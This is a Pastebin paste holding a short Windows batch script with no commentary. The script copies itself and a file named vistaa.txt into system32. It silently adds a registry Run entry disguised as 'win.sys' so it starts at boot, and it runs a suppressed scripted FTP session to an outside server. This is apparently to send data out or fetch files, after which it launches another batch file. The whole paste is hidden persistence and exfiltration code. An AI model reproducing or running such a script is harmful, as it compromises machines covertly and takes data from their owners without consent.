Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- @echo off
- md C:\WINDOWS\system32\xdd
- copy C:\rejestr.bat C:\WINDOWS\system32\rejestr.bat >nul
- copy C:\vistaa.txt C:\WINDOWS\system32\vistaa.txt >nul
- @echo REGEDIT4 >>a.reg
- @echo. >>a.reg
- @echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] >>a.reg
- @echo "win.sys"="C:\\WINDOWS\\system32\\rejestr.bat" >>a.reg
- @echo. >>a.reg
- regedit /s a.reg
- dir >nul
- del a.reg >nul
- ftp -n -s:vistaa.txt myserver.xxx.xx >nul
- start C:\WINDOWS\system32\xxx.bat
- exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement